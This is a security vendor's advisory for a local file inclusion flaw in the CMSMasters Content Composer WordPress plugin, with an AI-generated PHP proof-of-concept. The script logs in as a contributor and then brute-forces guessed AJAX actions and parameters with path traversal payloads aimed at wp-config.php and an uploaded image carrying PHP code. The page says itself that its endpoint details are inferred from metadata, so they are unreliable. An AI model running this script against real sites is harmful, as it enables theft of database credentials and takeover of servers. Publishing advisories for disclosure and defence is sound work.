Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-25326: CMSMasters Content Composer <= 1.4.5 – Authenticated (Contributor+) Local File Inclusion (cmsmasters-content-composer)

CVE ID CVE-2026-25326
Plugin cmsmasters-content-composer
Severity High (CVSS 7.5)
CWE 98
Vulnerable Version 1.4.5
Patched Version
Disclosed February 1, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-25326 (metadata-based):
The CMSMasters Content Composer plugin for WordPress versions up to and including 1.4.5 contains an authenticated local file inclusion vulnerability. Attackers with contributor-level permissions or higher can exploit this flaw to include and execute arbitrary files on the server. This vulnerability affects the plugin’s file inclusion mechanism, leading to potential remote code execution.

CWE-98 indicates improper control of filename arguments in PHP include/require statements. The vulnerability description confirms attackers can include arbitrary files, including uploaded images and other ‘safe’ file types containing PHP code. Atomic Edge research infers the plugin likely passes user-controlled input directly to PHP file inclusion functions without proper validation. This conclusion is based on the CWE classification and the described exploitation method. No source code confirmation is available.

Exploitation requires contributor-level authentication. Attackers would identify a vulnerable endpoint that accepts a file path parameter. They would then supply a path traversal payload to include local files containing PHP code. A common WordPress pattern involves AJAX handlers with actions like ‘cmsmasters_content_composer_action’ or similar. Attackers could upload an image with embedded PHP code via WordPress media uploads, then use the LFI vulnerability to include that file. The payload might resemble ‘../../../../uploads/2025/02/malicious.jpg’ or similar directory traversal sequences.

Remediation requires implementing strict validation on all file path parameters. The patched version likely added allowlisting of permitted file paths or basenames. Proper sanitization should remove directory traversal sequences like ‘../’. The fix should also verify file extensions against an allowlist and ensure included files reside within expected plugin directories. WordPress security best practices recommend using plugin_dir_path() or similar functions to construct safe absolute paths.

Successful exploitation leads to arbitrary PHP code execution on the target server. Attackers can bypass access controls, access sensitive data, and establish persistent backdoors. The CVSS vector indicates high impacts on confidentiality, integrity, and availability with low attack complexity. This vulnerability enables privilege escalation from contributor to administrator capabilities through code execution. Attackers could compromise the entire WordPress installation and underlying server.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-25326 - CMSMasters Content Composer <= 1.4.5 - Authenticated (Contributor+) Local File Inclusion
<?php
/**
 * Proof of Concept for CVE-2026-25326
 * Assumptions based on metadata analysis:
 * 1. Vulnerable endpoint is likely /wp-admin/admin-ajax.php
 * 2. Action parameter contains 'cmsmasters_content_composer' or similar
 * 3. File inclusion parameter accepts path traversal
 * 4. Contributor authentication required
 */

$target_url = 'https://target-site.com'; // CHANGE THIS
$username = 'contributor_user'; // CHANGE THIS
$password = 'contributor_pass'; // CHANGE THIS

// First, authenticate and obtain WordPress cookies
$login_url = $target_url . '/wp-login.php';
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// Create temporary cookie file
$cookie_file = tempnam(sys_get_temp_dir(), 'wp_cookie_');

// Initialize cURL session for authentication
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_COOKIEJAR => $cookie_file,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1'
    ]),
    CURLOPT_HTTPHEADER => [
        'Content-Type: application/x-www-form-urlencoded',
        'User-Agent: Atomic-Edge-PoC/1.0'
    ]
]);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if ($http_code !== 200 || strpos($response, 'Dashboard') === false) {
    echo "Authentication failed. Check credentials.n";
    unlink($cookie_file);
    exit(1);
}

echo "Authentication successful. Proceeding with exploitation attempt.n";

// Attempt exploitation via AJAX endpoint
// Based on plugin slug, likely action parameter values
$possible_actions = [
    'cmsmasters_content_composer_action',
    'content_composer_action',
    'cmsmasters_composer_action',
    'cmsmasters_ajax_action'
];

// Common file inclusion parameter names
$possible_params = [
    'file',
    'path',
    'include',
    'template',
    'view',
    'partial'
];

// Test payload - attempt to include wp-config.php
$payloads = [
    '../../../../wp-config.php',
    '../../../wp-config.php',
    'wp-config.php',
    '../../uploads/2025/02/malicious.jpg' // If attacker uploaded PHP in image
];

$exploited = false;

foreach ($possible_actions as $action) {
    foreach ($possible_params as $param) {
        foreach ($payloads as $payload) {
            curl_setopt_array($ch, [
                CURLOPT_URL => $ajax_url,
                CURLOPT_POSTFIELDS => http_build_query([
                    'action' => $action,
                    $param => $payload,
                    '_wpnonce' => 'test' // Nonce may not be required due to vulnerability
                ]),
                CURLOPT_COOKIEFILE => $cookie_file
            ]);
            
            $response = curl_exec($ch);
            
            // Check for indicators of successful inclusion
            if (strpos($response, 'DB_NAME') !== false || 
                strpos($response, 'define') !== false ||
                strpos($response, '<?php') !== false) {
                echo "Potential success! Action: $action, Param: $param, Payload: $payloadn";
                echo "Response snippet: " . substr($response, 0, 200) . "...n";
                $exploited = true;
                break 3;
            }
        }
    }
}

if (!$exploited) {
    echo "Exploitation attempt completed. No clear success indicators found.n";
    echo "Note: Actual parameters may differ. Manual testing with burp may be required.n";
}

// Cleanup
curl_close($ch);
unlink($cookie_file);

?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School